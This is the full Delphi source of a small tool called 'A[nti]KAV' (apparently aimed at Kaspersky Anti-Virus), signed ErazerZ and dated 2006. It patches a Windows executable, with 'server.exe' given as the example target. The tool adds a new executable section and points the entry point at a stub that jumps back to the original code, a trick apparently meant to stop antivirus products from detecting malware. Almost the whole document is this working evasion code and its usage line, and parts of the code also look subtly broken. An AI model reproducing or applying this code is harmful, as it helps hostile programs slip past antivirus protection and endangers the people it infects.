program AKAV; {$APPTYPE CONSOLE} uses Windows; function AddSection(FileName: String; SectionName: String): Boolean; const SectionCode: Array[0..6] of Byte = ( $B8, $00, $00, $00, $00, // MOV EAX, $00000000 $FF, $E0); // JMP EAX var i: ShortInt; hFile: THandle; DosHeader: TImageDosHeader; NtHeaders: TImageNtHeaders; SectionHeader, NewSection: TImageSectionHeader; dwOldEntryPoint, dwReadBytes, dwWrittenBytes: DWORD; begin Result := False; // Read DOS Header hFile := CreateFile(PChar(FileName), GENERIC_ALL, FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING, 0, 0); if hFile = 0 then begin CloseHandle(hFile); Exit; end; SetFilePointer(hFile, 0, nil, FILE_BEGIN); ReadFile(hFile, DosHeader, sizeof(DosHeader), dwReadBytes, nil); if dwReadBytes = sizeof(DosHeader) then begin // Read Nt Header SetFilePointer(hFile, DosHeader._lfanew, nil, FILE_BEGIN); ReadFile(hFile, NtHeaders, sizeof(NtHeaders), dwReadBytes, nil); if dwReadBytes = sizeof(NtHeaders) then begin // Read Section Header SetFilePointer(hFile, sizeof(SectionHeader) * (NtHeaders.FileHeader.NumberOfSections -1), nil, FILE_CURRENT); ReadFile(hFile, SectionHeader, sizeof(SectionHeader), dwReadBytes, nil); if dwReadBytes = sizeof(SectionHeader) then begin // New Section if SectionName = '' then SectionName := '.EDI'; // Section Name for i := 0 to 7 do NewSection.Name[i] := Byte(SectionName[i +1]); // The options of the Section NewSection.VirtualAddress := NtHeaders.OptionalHeader.SizeOfImage; NewSection.Misc.VirtualSize := $200; NewSection.SizeOfRawData := (NewSection.VirtualAddress div NtHeaders.OptionalHeader.FileAlignment +1) * NtHeaders.OptionalHeader.FileAlignment - NtHeaders.OptionalHeader.SizeOfImage; NewSection.PointerToRawData := SectionHeader.SizeOfRawData + SectionHeader.PointerToRawData; NewSection.Characteristics := $E0000020; Inc(NtHeaders.FileHeader.NumberOfSections); // Write new Section WriteFile(hFile, NewSection, sizeof(NewSection), dwWrittenBytes, nil); if dwWrittenBytes = sizeof(NewSection) then begin // New Entrypoint dwOldEntryPoint := NtHeaders.OptionalHeader.AddressOfEntryPoint + NtHeaders.OptionalHeader.ImageBase; NtHeaders.OptionalHeader.AddressOfEntryPoint := NewSection.VirtualAddress; // change the SectionCode "EntryPoint" PDWORD(DWORD(@SectionCode) +1)^ := dwOldEntryPoint; // write the new sizeofimage NtHeaders.OptionalHeader.SizeOfImage := NtHeaders.OptionalHeader.SizeOfImage + NewSection.Misc.VirtualSize; SetFilePointer(hFile, DosHeader._lfanew, nil, FILE_BEGIN); WriteFile(hFile, NtHeaders, sizeof(NtHeaders), dwWrittenBytes, nil); if dwWrittenBytes = sizeof(NtHeaders) then begin // write the new section SetFilePointer(hFile, GetFileSize(hFile, nil), nil, FILE_BEGIN); WriteFile(hFile, SectionCode, NewSection.Misc.VirtualSize, dwWrittenBytes, nil); if dwWrittenBytes = NewSection.Misc.VirtualSize then begin CloseHandle(hFile); Result := True; end else CloseHandle(hFile); end else CloseHandle(hFile); end else CloseHandle(hFile); end else CloseHandle(hFile); end else CloseHandle(hFile); end else CloseHandle(hFile); end; begin WriteLn; WriteLn('A[nti]KAV by ErazerZ'); WriteLn('5th January 2006'); WriteLn('Web: http://www.gateofgod.com'); WriteLn('E-Mail: ErazerZ@gmail.com'); WriteLn; if (ParamStr(1) <> '') then begin if AddSection(ParamStr(1), ParamStr(2)) then WriteLn('File is patched!') else WriteLn('Error while patching!'); end else begin WriteLn('Usage:' +#9#9+ 'AKAV.exe '); WriteLn('Example:' +#9+ 'AKAV.exe "c:\server.exe" ".ErazerZ"'); end; end.